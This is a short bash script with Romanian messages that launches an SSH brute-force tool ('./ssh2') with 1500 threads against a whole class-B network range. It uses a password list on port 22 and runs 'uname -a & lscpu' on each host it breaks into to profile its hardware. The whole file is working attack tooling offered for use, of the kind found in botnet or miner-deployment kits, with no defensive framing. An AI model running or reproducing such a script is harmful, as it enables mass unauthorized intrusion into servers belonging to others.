#!/bin/bash
### Set conexiuni tool ###
passfile=pass
threads=1500
port=22
#
WHI='[1;37m'
BLK='[1;30m'
RED='[1;31m'
YEL='[1;33m'
BLU='[1;34m'
RES='[0m'

if [ $# != 1 ]; then
        echo "${WHI}   Folosim: $0 <b class>${RES}"
        exit;
fi
./ssh2 $threads -b $1 $passfile $port "uname -a & lscpu"
sleep 5
pkill ssh2
echo "${RED}[+]${BLK} Brutele TERMINAT.${RES}"
